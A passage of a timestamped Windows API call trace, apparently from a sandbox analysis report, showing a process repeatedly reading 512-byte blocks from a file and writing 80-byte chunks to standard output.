[0128.923] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.923] WriteFile (in: hFile=0x50, lpBuffer=0x2aee3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.923] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.923] GetFileType (hFile=0x50) returned 0x1 [0128.923] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.923] WriteFile (in: hFile=0x50, lpBuffer=0x2aee8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aee8c*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.923] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.923] GetFileType (hFile=0x50) returned 0x1 [0128.924] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.924] WriteFile (in: hFile=0x50, lpBuffer=0x2aeedc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aeedc*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.924] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.924] GetFileType (hFile=0x50) returned 0x1 [0128.924] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.924] WriteFile (in: hFile=0x50, lpBuffer=0x2aef2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aef2c*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.924] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.924] GetFileType (hFile=0x50) returned 0x1 [0128.924] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.924] WriteFile (in: hFile=0x50, lpBuffer=0x2aef7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aef7c*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.924] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.924] GetFileType (hFile=0x50) returned 0x1 [0128.924] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.924] WriteFile (in: hFile=0x50, lpBuffer=0x2aefcc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aefcc*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.924] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.924] GetFileType (hFile=0x50) returned 0x1 [0128.924] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.924] WriteFile (in: hFile=0x50, lpBuffer=0x2af01c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2af01c*, lpNumberOfBytesWritten=0x2ae020*=0x20, lpOverlapped=0x0) returned 1 [0128.924] _get_osfhandle (_FileHandle=4) returned 0x58 [0128.924] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae00c | out: lpNewFilePointer=0x0) returned 1 [0128.924] _get_osfhandle (_FileHandle=4) returned 0x58 [0128.924] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.924] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.924] GetFileType (hFile=0x50) returned 0x1 [0128.924] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.924] GetFileType (hFile=0x50) returned 0x1 [0128.924] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.924] WriteFile (in: hFile=0x50, lpBuffer=0x2aee3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.924] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.924] GetFileType (hFile=0x50) returned 0x1 [0128.924] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.924] WriteFile (in: hFile=0x50, lpBuffer=0x2aee8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aee8c*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.924] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.925] GetFileType (hFile=0x50) returned 0x1 [0128.925] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.925] WriteFile (in: hFile=0x50, lpBuffer=0x2aeedc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aeedc*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.925] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.925] GetFileType (hFile=0x50) returned 0x1 [0128.925] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.925] WriteFile (in: hFile=0x50, lpBuffer=0x2aef2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aef2c*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.925] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.925] GetFileType (hFile=0x50) returned 0x1 [0128.925] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.925] WriteFile (in: hFile=0x50, lpBuffer=0x2aef7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aef7c*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.925] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.925] GetFileType (hFile=0x50) returned 0x1 [0128.925] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.925] WriteFile (in: hFile=0x50, lpBuffer=0x2aefcc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aefcc*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.925] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.925] GetFileType (hFile=0x50) returned 0x1 [0128.925] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.925] WriteFile (in: hFile=0x50, lpBuffer=0x2af01c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2af01c*, lpNumberOfBytesWritten=0x2ae020*=0x20, lpOverlapped=0x0) returned 1 [0128.925] _get_osfhandle (_FileHandle=4) returned 0x58 [0128.925] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae00c | out: lpNewFilePointer=0x0) returned 1 [0128.925] _get_osfhandle (_FileHandle=4) returned 0x58 [0128.925] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.925] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.925] GetFileType (hFile=0x50) returned 0x1 [0128.925] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.925] GetFileType (hFile=0x50) returned 0x1 [0128.925] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.925] WriteFile (in: hFile=0x50, lpBuffer=0x2aee3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.925] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.925] GetFileType (hFile=0x50) returned 0x1 [0128.925] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.925] WriteFile (in: hFile=0x50, lpBuffer=0x2aee8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aee8c*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.925] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.926] GetFileType (hFile=0x50) returned 0x1 [0128.926] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.926] WriteFile (in: hFile=0x50, lpBuffer=0x2aeedc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aeedc*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.926] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.926] GetFileType (hFile=0x50) returned 0x1 [0128.926] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.926] WriteFile (in: hFile=0x50, lpBuffer=0x2aef2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aef2c*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.926] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.926] GetFileType (hFile=0x50) returned 0x1 [0128.926] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.926] WriteFile (in: hFile=0x50, lpBuffer=0x2aef7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aef7c*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.926] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.926] GetFileType (hFile=0x50) returned 0x1 [0128.926] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.926] WriteFile (in: hFile=0x50, lpBuffer=0x2aefcc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aefcc*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.926] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.926] GetFileType (hFile=0x50) returned 0x1 [0128.926] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.926] WriteFile (in: hFile=0x50, lpBuffer=0x2af01c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2af01c*, lpNumberOfBytesWritten=0x2ae020*=0x20, lpOverlapped=0x0) returned 1 [0128.926] _get_osfhandle (_FileHandle=4) returned 0x58 [0128.926] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae00c | out: lpNewFilePointer=0x0) returned 1 [0128.926] _get_osfhandle (_FileHandle=4) returned 0x58 [0128.926] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.926] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.926] GetFileType (hFile=0x50) returned 0x1 [0128.926] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.926] GetFileType (hFile=0x50) returned 0x1 [0128.926] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.926] WriteFile (in: hFile=0x50, lpBuffer=0x2aee3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.926] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.926] GetFileType (hFile=0x50) returned 0x1 [0128.926] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.926] WriteFile (in: hFile=0x50, lpBuffer=0x2aee8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aee8c*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.926] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.927] GetFileType (hFile=0x50) returned 0x1 [0128.927] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.927] WriteFile (in: hFile=0x50, lpBuffer=0x2aeedc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aeedc*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.927] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.927] GetFileType (hFile=0x50) returned 0x1 [0128.927] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.927] WriteFile (in: hFile=0x50, lpBuffer=0x2aef2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aef2c*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.927] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.927] GetFileType (hFile=0x50) returned 0x1 [0128.927] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.927] WriteFile (in: hFile=0x50, lpBuffer=0x2aef7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aef7c*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.927] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.927] GetFileType (hFile=0x50) returned 0x1 [0128.927] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.927] WriteFile (in: hFile=0x50, lpBuffer=0x2aefcc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aefcc*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.927] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.927] GetFileType (hFile=0x50) returned 0x1 [0128.927] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.927] WriteFile (in: hFile=0x50, lpBuffer=0x2af01c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2af01c*, lpNumberOfBytesWritten=0x2ae020*=0x20, lpOverlapped=0x0) returned 1 [0128.927] _get_osfhandle (_FileHandle=4) returned 0x58 [0128.927] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae00c | out: lpNewFilePointer=0x0) returned 1 [0128.927] _get_osfhandle (_FileHandle=4) returned 0x58 [0128.927] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.927] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.927] GetFileType (hFile=0x50) returned 0x1 [0128.927] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.927] GetFileType (hFile=0x50) returned 0x1 [0128.927] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.927] WriteFile (in: hFile=0x50, lpBuffer=0x2aee3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.927] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.927] GetFileType (hFile=0x50) returned 0x1 [0128.928] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.928] WriteFile (in: hFile=0x50, lpBuffer=0x2aee8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aee8c*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.928] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.928] GetFileType (hFile=0x50) returned 0x1 [0128.928] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.928] WriteFile (in: hFile=0x50, lpBuffer=0x2aeedc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aeedc*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.928] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.928] GetFileType (hFile=0x50) returned 0x1 [0128.928] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.928] WriteFile (in: hFile=0x50, lpBuffer=0x2aef2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aef2c*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.928] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.928] GetFileType (hFile=0x50) returned 0x1 [0128.928] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.928] WriteFile (in: hFile=0x50, lpBuffer=0x2aef7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aef7c*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.928] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.928] GetFileType (hFile=0x50) returned 0x1 [0128.928] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.928] WriteFile (in: hFile=0x50, lpBuffer=0x2aefcc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aefcc*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.928] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.928] GetFileType (hFile=0x50) returned 0x1 [0128.928] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.928] WriteFile (in: hFile=0x50, lpBuffer=0x2af01c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2af01c*, lpNumberOfBytesWritten=0x2ae020*=0x20, lpOverlapped=0x0) returned 1 [0128.928] _get_osfhandle (_FileHandle=4) returned 0x58 [0128.928] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae00c | out: lpNewFilePointer=0x0) returned 1 [0128.928] _get_osfhandle (_FileHandle=4) returned 0x58 [0128.928] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.928] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.928] GetFileType (hFile=0x50) returned 0x1 [0128.928] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.928] GetFileType (hFile=0x50) returned 0x1 [0128.928] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.928] WriteFile (in: hFile=0x50, lpBuffer=0x2aee3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.929] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.929] GetFileType (hFile=0x50) returned 0x1 [0128.929] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.929] WriteFile (in: hFile=0x50, lpBuffer=0x2aee8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aee8c*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.929] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.929] GetFileType (hFile=0x50) returned 0x1 [0128.929] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.929] WriteFile (in: hFile=0x50, lpBuffer=0x2aeedc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aeedc*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.929] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.929] GetFileType (hFile=0x50) returned 0x1 [0128.929] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.929] WriteFile (in: hFile=0x50, lpBuffer=0x2aef2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aef2c*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.929] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.929] GetFileType (hFile=0x50) returned 0x1 [0128.929] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.929] WriteFile (in: hFile=0x50, lpBuffer=0x2aef7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aef7c*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.929] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.929] GetFileType (hFile=0x50) returned 0x1 [0128.929] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.929] WriteFile (in: hFile=0x50, lpBuffer=0x2aefcc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aefcc*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.929] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.929] GetFileType (hFile=0x50) returned 0x1 [0128.929] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.929] WriteFile (in: hFile=0x50, lpBuffer=0x2af01c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2af01c*, lpNumberOfBytesWritten=0x2ae020*=0x20, lpOverlapped=0x0) returned 1 [0128.929] _get_osfhandle (_FileHandle=4) returned 0x58 [0128.929] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae00c | out: lpNewFilePointer=0x0) returned 1 [0128.929] _get_osfhandle (_FileHandle=4) returned 0x58 [0128.929] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.929] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.929] GetFileType (hFile=0x50) returned 0x1 [0128.929] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.929] GetFileType (hFile=0x50) returned 0x1 [0128.929] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.929] WriteFile (in: hFile=0x50, lpBuffer=0x2aee3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.930] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.930] GetFileType (hFile=0x50) returned 0x1 [0128.930] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.930] WriteFile (in: hFile=0x50, lpBuffer=0x2aee8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aee8c*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.930] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.930] GetFileType (hFile=0x50) returned 0x1 [0128.930] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.930] WriteFile (in: hFile=0x50, lpBuffer=0x2aeedc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aeedc*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.930] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.930] GetFileType (hFile=0x50) returned 0x1 [0128.930] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.930] WriteFile (in: hFile=0x50, lpBuffer=0x2aef2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aef2c*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.930] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.930] GetFileType (hFile=0x50) returned 0x1 [0128.930] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.930] WriteFile (in: hFile=0x50, lpBuffer=0x2aef7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aef7c*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.930] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.930] GetFileType (hFile=0x50) returned 0x1 [0128.930] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.930] WriteFile (in: hFile=0x50, lpBuffer=0x2aefcc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aefcc*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.930] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.930] GetFileType (hFile=0x50) returned 0x1 [0128.930] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.930] WriteFile (in: hFile=0x50, lpBuffer=0x2af01c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2af01c*, lpNumberOfBytesWritten=0x2ae020*=0x20, lpOverlapped=0x0) returned 1 [0128.930] _get_osfhandle (_FileHandle=4) returned 0x58 [0128.930] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae00c | out: lpNewFilePointer=0x0) returned 1 [0128.930] _get_osfhandle (_FileHandle=4) returned 0x58 [0128.930] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.930] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.930] GetFileType (hFile=0x50) returned 0x1 [0128.930] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.930] GetFileType (hFile=0x50) returned 0x1 [0128.930] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.931] WriteFile (in: hFile=0x50, lpBuffer=0x2aee3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.931] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.931] GetFileType (hFile=0x50) returned 0x1 [0128.931] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.931] WriteFile (in: hFile=0x50, lpBuffer=0x2aee8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aee8c*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.931] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.931] GetFileType (hFile=0x50) returned 0x1 [0128.931] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.931] WriteFile (in: hFile=0x50, lpBuffer=0x2aeedc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aeedc*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.931] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.931] GetFileType (hFile=0x50) returned 0x1 [0128.931] 